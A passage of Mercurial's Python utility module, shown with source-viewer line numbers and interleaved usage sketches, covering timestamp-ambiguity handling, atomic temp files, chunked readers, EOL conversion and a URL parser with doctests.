2148 2148 - S[n-1].ctime > S[n].ctime: never occurs naturally (don't care)
2149 2149
2150 2150 Case (*2) above means that a file was changed twice or more at
2151 2151 same time in sec (= S[n-1].ctime), and comparison of timestamp
2152 2152 is ambiguous.
2153 2153
2154 2154 Base idea to avoid such ambiguity is "advance mtime 1 sec, if
2155 2155 timestamp is ambiguous".
2156 2156
2157 2157 But advancing mtime only in case (*2) doesn't work as
2158 2158 expected, because naturally advanced S[n].mtime in case (*1)
2159 2159 might be equal to manually advanced S[n-1 or earlier].mtime.
2160 2160
2161 2161 Therefore, all "S[n-1].ctime == S[n].ctime" cases should be
2162 2162 treated as ambiguous regardless of mtime, to avoid overlooking
2163 2163 a change caused by such colliding mtimes.
2164 2164
2165 2165 Advancing mtime "if isambig(oldstat)" ensures "S[n-1].mtime !=
2166 2166 S[n].mtime", even if size of a file isn't changed.
2167 2167 """
2168 2168 try:
2169 2169 return (self.stat[stat.ST_CTIME] == old.stat[stat.ST_CTIME])
2170 2170 except AttributeError:
2171 2171 return False
2172 2172
2173 2173 def avoidambig(self, path, old):
2174 2174 """Change file stat of specified path to avoid ambiguity
2175 2175
2176 2176 'old' should be previous filestat of 'path'.
2177 2177
2178 2178 This skips avoiding ambiguity, if a process doesn't have
2179 2179 appropriate privileges for 'path'. This returns False in this
2180 2180 case.
2181 2181
2182 2182 Otherwise, this returns True, as "ambiguity is avoided".
2183 2183 """
2184 2184 advanced = (old.stat[stat.ST_MTIME] + 1) & 0x7fffffff
2185 2185 try:
2186 2186 os.utime(path, (advanced, advanced))
2187 2187 except OSError as inst:
2188 2188 if inst.errno == errno.EPERM:
2189 2189 # utime() on the file created by another user causes EPERM,
2190 2190 # if a process doesn't have appropriate privileges
2191 2191 return False
2192 2192 raise
2193 2193 return True
2194 2194
2195 2195 def __ne__(self, other):
2196 2196 return not self == other
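
# Illustrative sketch (hypothetical path to an existing, writable file):
# two stats taken within the same second share st_ctime and are therefore
# mutually ambiguous; bumping the mtime with avoidambig() lets readers
# still notice the change.
def _filestatexample(path):
    writefile(path, b'first version')
    old = filestat.frompath(path)
    writefile(path, b'second version, possibly within the same second')
    new = filestat.frompath(path)
    if new.isambig(old):
        new.avoidambig(path, old)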
2197 2197
2198 2198 class atomictempfile(object):
2199 2199 '''writable file object that atomically updates a file
2200 2200
2201 2201 All writes will go to a temporary copy of the original file. Call
2202 2202 close() when you are done writing, and atomictempfile will rename
2203 2203 the temporary copy to the original name, making the changes
2204 2204 visible. If the object is destroyed without being closed, all your
2205 2205 writes are discarded.
2206 2206
2207 2207 checkambig argument of constructor is used with filestat, and is
2208 2208 useful only if target file is guarded by any lock (e.g. repo.lock
2209 2209 or repo.wlock).
2210 2210 '''
2211 2211 def __init__(self, name, mode='w+b', createmode=None, checkambig=False):
2212 2212 self.__name = name # permanent name
2213 2213 self._tempname = mktempcopy(name, emptyok=('w' in mode),
2214 2214 createmode=createmode,
2215 2215 enforcewritable=('w' in mode))
2216 2216
2217 2217 self._fp = posixfile(self._tempname, mode)
2218 2218 self._checkambig = checkambig
2219 2219
2220 2220 # delegated methods
2221 2221 self.read = self._fp.read
2222 2222 self.write = self._fp.write
2223 2223 self.seek = self._fp.seek
2224 2224 self.tell = self._fp.tell
2225 2225 self.fileno = self._fp.fileno
2226 2226
2227 2227 def close(self):
2228 2228 if not self._fp.closed:
2229 2229 self._fp.close()
2230 2230 filename = localpath(self.__name)
2231 2231 oldstat = self._checkambig and filestat.frompath(filename)
2232 2232 if oldstat and oldstat.stat:
2233 2233 rename(self._tempname, filename)
2234 2234 newstat = filestat.frompath(filename)
2235 2235 if newstat.isambig(oldstat):
2236 2236 # stat of changed file is ambiguous to original one
2237 2237 advanced = (oldstat.stat[stat.ST_MTIME] + 1) & 0x7fffffff
2238 2238 os.utime(filename, (advanced, advanced))
2239 2239 else:
2240 2240 rename(self._tempname, filename)
2241 2241
2242 2242 def discard(self):
2243 2243 if not self._fp.closed:
2244 2244 try:
2245 2245 os.unlink(self._tempname)
2246 2246 except OSError:
2247 2247 pass
2248 2248 self._fp.close()
2249 2249
2250 2250 def __del__(self):
2251 2251 if safehasattr(self, '_fp'): # constructor actually did something
2252 2252 self.discard()
2253 2253
2254 2254 def __enter__(self):
2255 2255 return self
2256 2256
2257 2257 def __exit__(self, exctype, excvalue, traceback):
2258 2258 if exctype is not None:
2259 2259 self.discard()
2260 2260 else:
2261 2261 self.close()
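
# Illustrative sketch ('path' is a hypothetical file in an existing,
# writable directory): all writes land in a temporary file and only replace
# 'path' when close() succeeds; an exception inside the with-block discards
# the temporary file instead.
def _atomictempfileexample(path):
    with atomictempfile(path, 'wb') as fp:
        fp.write(b'all or nothing\n')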
2262 2262
2263 2263 def unlinkpath(f, ignoremissing=False, rmdir=True):
2264 2264 """unlink and remove the directory if it is empty"""
2265 2265 if ignoremissing:
2266 2266 tryunlink(f)
2267 2267 else:
2268 2268 unlink(f)
2269 2269 if rmdir:
2270 2270 # try removing directories that might now be empty
2271 2271 try:
2272 2272 removedirs(os.path.dirname(f))
2273 2273 except OSError:
2274 2274 pass
2275 2275
2276 2276 def tryunlink(f):
2277 2277 """Attempt to remove a file, ignoring ENOENT errors."""
2278 2278 try:
2279 2279 unlink(f)
2280 2280 except OSError as e:
2281 2281 if e.errno != errno.ENOENT:
2282 2282 raise
2283 2283
2284 2284 def makedirs(name, mode=None, notindexed=False):
2285 2285 """recursive directory creation with parent mode inheritance
2286 2286
2287 2287 Newly created directories are marked as "not to be indexed by
2288 2288 the content indexing service", if ``notindexed`` is specified
2289 2289 for "write" mode access.
2290 2290 """
2291 2291 try:
2292 2292 makedir(name, notindexed)
2293 2293 except OSError as err:
2294 2294 if err.errno == errno.EEXIST:
2295 2295 return
2296 2296 if err.errno != errno.ENOENT or not name:
2297 2297 raise
2298 2298 parent = os.path.dirname(os.path.abspath(name))
2299 2299 if parent == name:
2300 2300 raise
2301 2301 makedirs(parent, mode, notindexed)
2302 2302 try:
2303 2303 makedir(name, notindexed)
2304 2304 except OSError as err:
2305 2305 # Catch EEXIST to handle races
2306 2306 if err.errno == errno.EEXIST:
2307 2307 return
2308 2308 raise
2309 2309 if mode is not None:
2310 2310 os.chmod(name, mode)
2311 2311
2312 2312 def readfile(path):
2313 2313 with open(path, 'rb') as fp:
2314 2314 return fp.read()
2315 2315
2316 2316 def writefile(path, text):
2317 2317 with open(path, 'wb') as fp:
2318 2318 fp.write(text)
2319 2319
2320 2320 def appendfile(path, text):
2321 2321 with open(path, 'ab') as fp:
2322 2322 fp.write(text)
2323 2323
2324 2324 class chunkbuffer(object):
2325 2325 """Allow arbitrary sized chunks of data to be efficiently read from an
2326 2326 iterator over chunks of arbitrary size."""
2327 2327
2328 2328 def __init__(self, in_iter):
2329 2329 """in_iter is the iterator that's iterating over the input chunks."""
2330 2330 def splitbig(chunks):
2331 2331 for chunk in chunks:
2332 2332 if len(chunk) > 2**20:
2333 2333 pos = 0
2334 2334 while pos < len(chunk):
2335 2335 end = pos + 2 ** 18
2336 2336 yield chunk[pos:end]
2337 2337 pos = end
2338 2338 else:
2339 2339 yield chunk
2340 2340 self.iter = splitbig(in_iter)
2341 2341 self._queue = collections.deque()
2342 2342 self._chunkoffset = 0
2343 2343
2344 2344 def read(self, l=None):
2345 2345 """Read L bytes of data from the iterator of chunks of data.
2346 2346 Returns less than L bytes if the iterator runs dry.
2347 2347
2348 2348 If size parameter is omitted, read everything"""
2349 2349 if l is None:
2350 2350 return ''.join(self.iter)
2351 2351
2352 2352 left = l
2353 2353 buf = []
2354 2354 queue = self._queue
2355 2355 while left > 0:
2356 2356 # refill the queue
2357 2357 if not queue:
2358 2358 target = 2**18
2359 2359 for chunk in self.iter:
2360 2360 queue.append(chunk)
2361 2361 target -= len(chunk)
2362 2362 if target <= 0:
2363 2363 break
2364 2364 if not queue:
2365 2365 break
2366 2366
2367 2367 # The easy way to do this would be to queue.popleft(), modify the
2368 2368 # chunk (if necessary), then queue.appendleft(). However, for cases
2369 2369 # where we read partial chunk content, this incurs 2 dequeue
2370 2370 # mutations and creates a new str for the remaining chunk in the
2371 2371 # queue. Our code below avoids this overhead.
2372 2372
2373 2373 chunk = queue[0]
2374 2374 chunkl = len(chunk)
2375 2375 offset = self._chunkoffset
2376 2376
2377 2377 # Use full chunk.
2378 2378 if offset == 0 and left >= chunkl:
2379 2379 left -= chunkl
2380 2380 queue.popleft()
2381 2381 buf.append(chunk)
2382 2382 # self._chunkoffset remains at 0.
2383 2383 continue
2384 2384
2385 2385 chunkremaining = chunkl - offset
2386 2386
2387 2387 # Use all of unconsumed part of chunk.
2388 2388 if left >= chunkremaining:
2389 2389 left -= chunkremaining
2390 2390 queue.popleft()
2391 2391 # offset == 0 is enabled by block above, so this won't merely
2392 2392 # copy via ``chunk[0:]``.
2393 2393 buf.append(chunk[offset:])
2394 2394 self._chunkoffset = 0
2395 2395
2396 2396 # Partial chunk needed.
2397 2397 else:
2398 2398 buf.append(chunk[offset:offset + left])
2399 2399 self._chunkoffset += left
2400 2400 left -= chunkremaining
2401 2401
2402 2402 return ''.join(buf)
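
# Illustrative sketch (hypothetical data): chunkbuffer lets fixed-size reads
# span the chunk boundaries of the underlying iterator.
def _chunkbufferexample():
    buf = chunkbuffer(iter([b'abc', b'def', b'g']))
    assert buf.read(4) == b'abcd'
    assert buf.read(3) == b'efg'
    assert buf.read(10) == b''   # the iterator is exhausted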
2403 2403
2404 2404 def filechunkiter(f, size=131072, limit=None):
2405 2405 """Create a generator that produces the data in the file size
2406 2406 (default 131072) bytes at a time, up to optional limit (default is
2407 2407 to read all data). Chunks may be less than size bytes if the
2408 2408 chunk is the last chunk in the file, or the file is a socket or
2409 2409 some other type of file that sometimes reads less data than is
2410 2410 requested."""
2411 2411 assert size >= 0
2412 2412 assert limit is None or limit >= 0
2413 2413 while True:
2414 2414 if limit is None:
2415 2415 nbytes = size
2416 2416 else:
2417 2417 nbytes = min(limit, size)
2418 2418 s = nbytes and f.read(nbytes)
2419 2419 if not s:
2420 2420 break
2421 2421 if limit:
2422 2422 limit -= len(s)
2423 2423 yield s
2424 2424
2425 2425 class cappedreader(object):
2426 2426 """A file object proxy that allows reading up to N bytes.
2427 2427
2428 2428 Given a source file object, instances of this type allow reading up to
2429 2429 N bytes from that source file object. Attempts to read past the allowed
2430 2430 limit are treated as EOF.
2431 2431
2432 2432 It is assumed that I/O is not performed on the original file object
2433 2433 in addition to I/O that is performed by this instance. If there is,
2434 2434 state tracking will get out of sync and unexpected results will ensue.
2435 2435 """
2436 2436 def __init__(self, fh, limit):
2437 2437 """Allow reading up to <limit> bytes from <fh>."""
2438 2438 self._fh = fh
2439 2439 self._left = limit
2440 2440
2441 2441 def read(self, n=-1):
2442 2442 if not self._left:
2443 2443 return b''
2444 2444
2445 2445 if n < 0:
2446 2446 n = self._left
2447 2447
2448 2448 data = self._fh.read(min(n, self._left))
2449 2449 self._left -= len(data)
2450 2450 assert self._left >= 0
2451 2451
2452 2452 return data
2453 2453
2454 2454 def readinto(self, b):
2455 2455 res = self.read(len(b))
2456 2456 if res is None:
2457 2457 return None
2458 2458
2459 2459 b[0:len(res)] = res
2460 2460 return len(res)
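
# Illustrative sketch (hypothetical data; pycompat.bytesio, the io.BytesIO
# alias, is assumed): a cappedreader exposes at most 'limit' bytes of the
# wrapped file object and reports EOF afterwards.
def _cappedreaderexample():
    reader = cappedreader(pycompat.bytesio(b'0123456789'), 4)
    assert reader.read() == b'0123'
    assert reader.read() == b''   # the cap behaves like end-of-file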
2461 2461
2462 2462 def unitcountfn(*unittable):
2463 2463 '''return a function that renders a readable count of some quantity'''
2464 2464
2465 2465 def go(count):
2466 2466 for multiplier, divisor, format in unittable:
2467 2467 if abs(count) >= divisor * multiplier:
2468 2468 return format % (count / float(divisor))
2469 2469 return unittable[-1][2] % count
2470 2470
2471 2471 return go
2472 2472
2473 2473 def processlinerange(fromline, toline):
2474 2474 """Check that linerange <fromline>:<toline> makes sense and return a
2475 2475 0-based range.
2476 2476
2477 2477 >>> processlinerange(10, 20)
2478 2478 (9, 20)
2479 2479 >>> processlinerange(2, 1)
2480 2480 Traceback (most recent call last):
2481 2481 ...
2482 2482 ParseError: line range must be positive
2483 2483 >>> processlinerange(0, 5)
2484 2484 Traceback (most recent call last):
2485 2485 ...
2486 2486 ParseError: fromline must be strictly positive
2487 2487 """
2488 2488 if toline - fromline < 0:
2489 2489 raise error.ParseError(_("line range must be positive"))
2490 2490 if fromline < 1:
2491 2491 raise error.ParseError(_("fromline must be strictly positive"))
2492 2492 return fromline - 1, toline
2493 2493
2494 2494 bytecount = unitcountfn(
2495 2495 (100, 1 << 30, _('%.0f GB')),
2496 2496 (10, 1 << 30, _('%.1f GB')),
2497 2497 (1, 1 << 30, _('%.2f GB')),
2498 2498 (100, 1 << 20, _('%.0f MB')),
2499 2499 (10, 1 << 20, _('%.1f MB')),
2500 2500 (1, 1 << 20, _('%.2f MB')),
2501 2501 (100, 1 << 10, _('%.0f KB')),
2502 2502 (10, 1 << 10, _('%.1f KB')),
2503 2503 (1, 1 << 10, _('%.2f KB')),
2504 2504 (1, 1, _('%.0f bytes')),
2505 2505 )
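
# Illustrative sketch (assumes the default, untranslated message catalog):
# bytecount() picks the first row whose threshold the quantity reaches, so
# precision shrinks as the value grows.
def _bytecountexample():
    assert bytecount(0) == '0 bytes'
    assert bytecount(2048) == '2.00 KB'
    assert bytecount(1 << 30) == '1.00 GB'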
2506 2506
2507 2507 class transformingwriter(object):
2508 2508 """Writable file wrapper to transform data by function"""
2509 2509
2510 2510 def __init__(self, fp, encode):
2511 2511 self._fp = fp
2512 2512 self._encode = encode
2513 2513
2514 2514 def close(self):
2515 2515 self._fp.close()
2516 2516
2517 2517 def flush(self):
2518 2518 self._fp.flush()
2519 2519
2520 2520 def write(self, data):
2521 2521 return self._fp.write(self._encode(data))
2522 2522
2523 2523 # Matches a single EOL which can either be a CRLF where repeated CR
2524 2524 # are removed or a LF. We do not care about old Macintosh files, so a
2525 2525 # stray CR is an error.
2526 2526 _eolre = remod.compile(br'\r*\n')
2527 2527
2528 2528 def tolf(s):
2529 2529 return _eolre.sub('\n', s)
2530 2530
2531 2531 def tocrlf(s):
2532 2532 return _eolre.sub('\r\n', s)
2533 2533
2534 2534 def _crlfwriter(fp):
2535 2535 return transformingwriter(fp, tocrlf)
2536 2536
2537 2537 if pycompat.oslinesep == '\r\n':
2538 2538 tonativeeol = tocrlf
2539 2539 fromnativeeol = tolf
2540 2540 nativeeolwriter = _crlfwriter
2541 2541 else:
2542 2542 tonativeeol = pycompat.identity
2543 2543 fromnativeeol = pycompat.identity
2544 2544 nativeeolwriter = pycompat.identity
2545 2545
2546 2546 if (pyplatform.python_implementation() == 'CPython' and
2547 2547 sys.version_info < (3, 0)):
2548 2548 # There is an issue in CPython that some IO methods do not handle EINTR
2549 2549 # correctly. The following table shows what CPython version (and functions)
2550 2550 # are affected (buggy: has the EINTR bug, okay: otherwise):
2551 2551 #
2552 2552 # | < 2.7.4 | 2.7.4 to 2.7.12 | >= 3.0
2553 2553 # --------------------------------------------------
2554 2554 # fp.__iter__ | buggy | buggy | okay
2555 2555 # fp.read* | buggy | okay [1] | okay
2556 2556 #
2557 2557 # [1]: fixed by changeset 67dc99a989cd in the cpython hg repo.
2558 2558 #
2559 2559 # Here we workaround the EINTR issue for fileobj.__iter__. Other methods
2560 2560 # like "read*" are ignored for now, as Python < 2.7.4 is a minority.
2561 2561 #
2562 2562 # Although we can workaround the EINTR issue for fp.__iter__, it is slower:
2563 2563 # "for x in fp" is 4x faster than "for x in iter(fp.readline, '')" in
2564 2564 # CPython 2, because CPython 2 maintains an internal readahead buffer for
2565 2565 # fp.__iter__ but not other fp.read* methods.
2566 2566 #
2567 2567 # On modern systems like Linux, the "read" syscall cannot be interrupted
2568 2568 # when reading "fast" files like on-disk files. So the EINTR issue only
2569 2569 # affects things like pipes, sockets, ttys etc. We treat "normal" (S_ISREG)
2570 2570 # files approximately as "fast" files and use the fast (unsafe) code path,
2571 2571 # to minimize the performance impact.
2572 2572 if sys.version_info >= (2, 7, 4):
2573 2573 # fp.readline deals with EINTR correctly, use it as a workaround.
2574 2574 def _safeiterfile(fp):
2575 2575 return iter(fp.readline, '')
2576 2576 else:
2577 2577 # fp.read* are broken too, manually deal with EINTR in a stupid way.
2578 2578 # note: this may block longer than necessary because of bufsize.
2579 2579 def _safeiterfile(fp, bufsize=4096):
2580 2580 fd = fp.fileno()
2581 2581 line = ''
2582 2582 while True:
2583 2583 try:
2584 2584 buf = os.read(fd, bufsize)
2585 2585 except OSError as ex:
2586 2586 # os.read only raises EINTR before any data is read
2587 2587 if ex.errno == errno.EINTR:
2588 2588 continue
2589 2589 else:
2590 2590 raise
2591 2591 line += buf
2592 2592 if '\n' in buf:
2593 2593 splitted = line.splitlines(True)
2594 2594 line = ''
2595 2595 for l in splitted:
2596 2596 if l[-1] == '\n':
2597 2597 yield l
2598 2598 else:
2599 2599 line = l
2600 2600 if not buf:
2601 2601 break
2602 2602 if line:
2603 2603 yield line
2604 2604
2605 2605 def iterfile(fp):
2606 2606 fastpath = True
2607 2607 if type(fp) is file:
2608 2608 fastpath = stat.S_ISREG(os.fstat(fp.fileno()).st_mode)
2609 2609 if fastpath:
2610 2610 return fp
2611 2611 else:
2612 2612 return _safeiterfile(fp)
2613 2613 else:
2614 2614 # PyPy and CPython 3 do not have the EINTR issue thus no workaround needed.
2615 2615 def iterfile(fp):
2616 2616 return fp
2617 2617
2618 2618 def iterlines(iterator):
2619 2619 for chunk in iterator:
2620 2620 for line in chunk.splitlines():
2621 2621 yield line
2622 2622
2623 2623 def expandpath(path):
2624 2624 return os.path.expanduser(os.path.expandvars(path))
2625 2625
2626 2626 def interpolate(prefix, mapping, s, fn=None, escape_prefix=False):
2627 2627 """Return the result of interpolating items in the mapping into string s.
2628 2628
2629 2629 prefix is a single character string, or a two character string with
2630 2630 a backslash as the first character if the prefix needs to be escaped in
2631 2631 a regular expression.
2632 2632
2633 2633 fn is an optional function that will be applied to the replacement text
2634 2634 just before replacement.
2635 2635
2636 2636 escape_prefix is an optional flag that allows using doubled prefix for
2637 2637 its escaping.
2638 2638 """
2639 2639 fn = fn or (lambda s: s)
2640 2640 patterns = '|'.join(mapping.keys())
2641 2641 if escape_prefix:
2642 2642 patterns += '|' + prefix
2643 2643 if len(prefix) > 1:
2644 2644 prefix_char = prefix[1:]
2645 2645 else:
2646 2646 prefix_char = prefix
2647 2647 mapping[prefix_char] = prefix_char
2648 2648 r = remod.compile(br'%s(%s)' % (prefix, patterns))
2649 2649 return r.sub(lambda x: fn(mapping[x.group()[1:]]), s)
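
# Illustrative sketch (hypothetical mapping): interpolate() replaces each
# prefix+key occurrence with the mapped value; '%' needs no regex escaping.
def _interpolateexample():
    mapping = {b'a': b'apple', b'b': b'banana'}
    assert interpolate(b'%', mapping, b'%a and %b') == b'apple and banana'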
2650 2650
2651 2651 def getport(port):
2652 2652 """Return the port for a given network service.
2653 2653
2654 2654 If port is an integer, it's returned as is. If it's a string, it's
2655 2655 looked up using socket.getservbyname(). If there's no matching
2656 2656 service, error.Abort is raised.
2657 2657 """
2658 2658 try:
2659 2659 return int(port)
2660 2660 except ValueError:
2661 2661 pass
2662 2662
2663 2663 try:
2664 2664 return socket.getservbyname(pycompat.sysstr(port))
2665 2665 except socket.error:
2666 2666 raise error.Abort(_("no port number associated with service '%s'")
2667 2667 % port)
2668 2668
2669 2669 class url(object):
2670 2670 r"""Reliable URL parser.
2671 2671
2672 2672 This parses URLs and provides attributes for the following
2673 2673 components:
2674 2674
2675 2675 <scheme>://<user>:<passwd>@<host>:<port>/<path>?<query>#<fragment>
2676 2676
2677 2677 Missing components are set to None. The only exception is
2678 2678 fragment, which is set to '' if present but empty.
2679 2679
2680 2680 If parsefragment is False, fragment is included in query. If
2681 2681 parsequery is False, query is included in path. If both are
2682 2682 False, both fragment and query are included in path.
2683 2683
2684 2684 See http://www.ietf.org/rfc/rfc2396.txt for more information.
2685 2685
2686 2686 Note that for backward compatibility reasons, bundle URLs do not
2687 2687 take host names. That means 'bundle://../' has a path of '../'.
2688 2688
2689 2689 Examples:
2690 2690
2691 2691 >>> url(b'http://www.ietf.org/rfc/rfc2396.txt')
2692 2692 <url scheme: 'http', host: 'www.ietf.org', path: 'rfc/rfc2396.txt'>
2693 2693 >>> url(b'ssh://[::1]:2200//home/joe/repo')
2694 2694 <url scheme: 'ssh', host: '[::1]', port: '2200', path: '/home/joe/repo'>
2695 2695 >>> url(b'file:///home/joe/repo')
2696 2696 <url scheme: 'file', path: '/home/joe/repo'>
2697 2697 >>> url(b'file:///c:/temp/foo/')
2698 2698 <url scheme: 'file', path: 'c:/temp/foo/'>
2699 2699 >>> url(b'bundle:foo')
2700 2700 <url scheme: 'bundle', path: 'foo'>
2701 2701 >>> url(b'bundle://../foo')
2702 2702 <url scheme: 'bundle', path: '../foo'>
2703 2703 >>> url(br'c:\foo\bar')
2704 2704 <url path: 'c:\\foo\\bar'>
2705 2705 >>> url(br'\\blah\blah\blah')
2706 2706 <url path: '\\\\blah\\blah\\blah'>
2707 2707 >>> url(br'\\blah\blah\blah#baz')
2708 2708 <url path: '\\\\blah\\blah\\blah', fragment: 'baz'>
2709 2709 >>> url(br'file:///C:\users\me')
2710 2710 <url scheme: 'file', path: 'C:\\users\\me'>
2711 2711
2712 2712 Authentication credentials:
2713 2713
2714 2714 >>> url(b'ssh://joe:xyz@x/repo')
2715 2715 <url scheme: 'ssh', user: 'joe', passwd: 'xyz', host: 'x', path: 'repo'>
2716 2716 >>> url(b'ssh://joe@x/repo')
2717 2717 <url scheme: 'ssh', user: 'joe', host: 'x', path: 'repo'>
2718 2718
2719 2719 Query strings and fragments:
2720 2720
2721 2721 >>> url(b'http://host/a?b#c')
2722 2722 <url scheme: 'http', host: 'host', path: 'a', query: 'b', fragment: 'c'>
2723 2723 >>> url(b'http://host/a?b#c', parsequery=False, parsefragment=False)
2724 2724 <url scheme: 'http', host: 'host', path: 'a?b#c'>
2725 2725
2726 2726 Empty path:
2727 2727
2728 2728 >>> url(b'')
2729 2729 <url path: ''>
2730 2730 >>> url(b'#a')
2731 2731 <url path: '', fragment: 'a'>
2732 2732 >>> url(b'http://host/')
2733 2733 <url scheme: 'http', host: 'host', path: ''>
2734 2734 >>> url(b'http://host/#a')
2735 2735 <url scheme: 'http', host: 'host', path: '', fragment: 'a'>
2736 2736
2737 2737 Only scheme:
2738 2738
2739 2739 >>> url(b'http:')
2740 2740 <url scheme: 'http'>
2741 2741 """
2742 2742
2743 2743 _safechars = "!~*'()+"
2744 2744 _safepchars = "/!~*'()+:\\"
2745 2745 _matchscheme = remod.compile('^[a-zA-Z0-9+.\\-]+:').match
2746 2746
2747 2747 def __init__(self, path, parsequery=True, parsefragment=True):
2748 2748 # We slowly chomp away at path until we have only the path left
2749 2749 self.scheme = self.user = self.passwd = self.host = None
2750 2750 self.port = self.path = self.query = self.fragment = None
2751 2751 self._localpath = True
2752 2752 self._hostport = ''
2753 2753 self._origpath = path
2754 2754
2755 2755 if parsefragment and '#' in path:
2756 2756 path, self.fragment = path.split('#', 1)
2757 2757
2758 2758 # special case for Windows drive letters and UNC paths
2759 2759 if hasdriveletter(path) or path.startswith('\\\\'):
2760 2760 self.path = path
2761 2761 return
2762 2762
2763 2763 # For compatibility reasons, we can't handle bundle paths as
2764 2764 # normal URLs
2765 2765 if path.startswith('bundle:'):
2766 2766 self.scheme = 'bundle'
2767 2767 path = path[7:]
2768 2768 if path.startswith('//'):
2769 2769 path = path[2:]
2770 2770 self.path = path
2771 2771 return
2772 2772
2773 2773 if self._matchscheme(path):
2774 2774 parts = path.split(':', 1)
2775 2775 if parts[0]:
2776 2776 self.scheme, path = parts
2777 2777 self._localpath = False
2778 2778
2779 2779 if not path:
2780 2780 path = None
2781 2781 if self._localpath:
2782 2782 self.path = ''
2783 2783 return
2784 2784 else:
2785 2785 if self._localpath:
2786 2786 self.path = path
2787 2787 return
2788 2788
2789 2789 if parsequery and '?' in path:
2790 2790 path, self.query = path.split('?', 1)
2791 2791 if not path:
2792 2792 path = None
2793 2793 if not self.query:
2794 2794 self.query = None
2795 2795
2796 2796 # // is required to specify a host/authority
2797 2797 if path and path.startswith('//'):
2798 2798 parts = path[2:].split('/', 1)
2799 2799 if len(parts) > 1:
2800 2800 self.host, path = parts
2801 2801 else:
2802 2802 self.host = parts[0]
2803 2803 path = None
2804 2804 if not self.host:
2805 2805 self.host = None
2806 2806 # path of file:///d is /d
2807 2807 # path of file:///d:/ is d:/, not /d:/
2808 2808 if path and not hasdriveletter(path):
2809 2809 path = '/' + path
2810 2810
2811 2811 if self.host and '@' in self.host:
2812 2812 self.user, self.host = self.host.rsplit('@', 1)
2813 2813 if ':' in self.user:
2814 2814 self.user, self.passwd = self.user.split(':', 1)
2815 2815 if not self.host:
2816 2816 self.host = None
2817 2817
2818 2818 # Don't split on colons in IPv6 addresses without ports
2819 2819 if (self.host and ':' in self.host and
2820 2820 not (self.host.startswith('[') and self.host.endswith(']'))):
2821 2821 self._hostport = self.host
2822 2822 self.host, self.port = self.host.rsplit(':', 1)
2823 2823 if not self.host:
2824 2824 self.host = None
2825 2825
2826 2826 if (self.host and self.scheme == 'file' and
2827 2827 self.host not in ('localhost', '127.0.0.1', '[::1]')):
2828 2828 raise error.Abort(_('file:// URLs can only refer to localhost'))
2829 2829
2830 2830 self.path = path
2831 2831
2832 2832 # leave the query string escaped
2833 2833 for a in ('user', 'passwd', 'host', 'port',
2834 2834 'path', 'fragment'):
2835 2835 v = getattr(self, a)
2836 2836 if v is not None:
2837 2837 setattr(self, a, urlreq.unquote(v))
2838 2838
2839 2839 @encoding.strmethod
2840 2840 def __repr__(self):
2841 2841 attrs = []
2842 2842 for a in ('scheme', 'user', 'passwd', 'host', 'port', 'path',
2843 2843 'query', 'fragment'):
2844 2844 v = getattr(self, a)
2845 2845 if v is not None:
2846 2846 attrs.append('%s: %r' % (a, pycompat.bytestr(v)))
2847 2847 return '<url %s>' % ', '.join(attrs)
2848 2848
2849 2849 def __bytes__(self):
2850 2850 r"""Join the URL's components back into a URL string.
2851 2851
2852 2852 Examples:
2853 2853
2854 2854 >>> bytes(url(b'http://user:pw@host:80/c:/bob?fo:oo#ba:ar'))
2855 2855 'http://user:pw@host:80/c:/bob?fo:oo#ba:ar'
2856 2856 >>> bytes(url(b'http://user:pw@host:80/?foo=bar&baz=42'))
2857 2857 'http://user:pw@host:80/?foo=bar&baz=42'
2858 2858 >>> bytes(url(b'http://user:pw@host:80/?foo=bar%3dbaz'))
2859 2859 'http://user:pw@host:80/?foo=bar%3dbaz'
2860 2860 >>> bytes(url(b'ssh://user:pw@[::1]:2200//home/joe#'))
2861 2861 'ssh://user:pw@[::1]:2200//home/joe#'
2862 2862 >>> bytes(url(b'http://localhost:80//'))
2863 2863 'http://localhost:80//'
2864 2864 >>> bytes(url(b'http://localhost:80/'))
2865 2865 'http://localhost:80/'
2866 2866 >>> bytes(url(b'http://localhost:80'))
2867 2867 'http://localhost:80/'
2868 2868 >>> bytes(url(b'bundle:foo'))
2869 2869 'bundle:foo'
2870 2870 >>> bytes(url(b'bundle://../foo'))
2871 2871 'bundle:../foo'
2872 2872 >>> bytes(url(b'path'))
2873 2873 'path'
2874 2874 >>> bytes(url(b'file:///tmp/foo/bar'))
2875 2875 'file:///tmp/foo/bar'
2876 2876 >>> bytes(url(b'file:///c:/tmp/foo/bar'))
2877 2877 'file:///c:/tmp/foo/bar'
2878 2878 >>> print(url(br'bundle:foo\bar'))
2879 2879 bundle:foo\bar
2880 2880 >>> print(url(br'file:///D:\data\hg'))
2881 2881 file:///D:\data\hg
2882 2882 """
2883 2883 if self._localpath:
2884 2884 s = self.path
2885 2885 if self.scheme == 'bundle':
2886 2886 s = 'bundle:' + s
2887 2887 if self.fragment:
2888 2888 s += '#' + self.fragment
2889 2889 return s
2890 2890
2891 2891 s = self.scheme + ':'
2892 2892 if self.user or self.passwd or self.host:
2893 2893 s += '//'
2894 2894 elif self.scheme and (not self.path or self.path.startswith('/')
2895 2895 or hasdriveletter(self.path)):
2896 2896 s += '//'
2897 2897 if hasdriveletter(self.path):
2898 2898 s += '/'
2899 2899 if self.user:
2900 2900 s += urlreq.quote(self.user, safe=self._safechars)
2901 2901 if self.passwd:
2902 2902 s += ':' + urlreq.quote(self.passwd, safe=self._safechars)
2903 2903 if self.user or self.passwd:
2904 2904 s += '@'
2905 2905 if self.host:
2906 2906 if not (self.host.startswith('[') and self.host.endswith(']')):
2907 2907 s += urlreq.quote(self.host)
2908 2908 else:
2909 2909 s += self.host
2910 2910 if self.port:
2911 2911 s += ':' + urlreq.quote(self.port)
2912 2912 if self.host:
2913 2913 s += '/'
2914 2914 if self.path:
2915 2915 # TODO: similar to the query string, we should not unescape the
2916 2916 # path when we store it, the path might contain '%2f' = '/',
2917 2917 # which we should *not* escape.
2918 2918 s += urlreq.quote(self.path, safe=self._safepchars)
2919 2919 if self.query:
2920 2920 # we store the query in escaped form.
2921 2921 s += '?' + self.query
2922 2922 if self.fragment is not None:
2923 2923 s += '#' + urlreq.quote(self.fragment, safe=self._safepchars)
2924 2924 return s
2925 2925
2926 2926 __str__ = encoding.strmethod(__bytes__)
2927 2927
2928 2928 def authinfo(self):
2929 2929 user, passwd = self.user, self.passwd
2930 2930 try:
2931 2931 self.user, self.passwd = None, None
2932 2932 s = bytes(self)
2933 2933 finally:
2934 2934 self.user, self.passwd = user, passwd
2935 2935 if not self.user:
2936 2936 return (s, None)
2937 2937 # authinfo[1] is passed to urllib2 password manager, and its
2938 2938 # URIs must not contain credentials. The host is passed in the
2939 2939 # URIs list because Python < 2.4.3 uses only that to search for
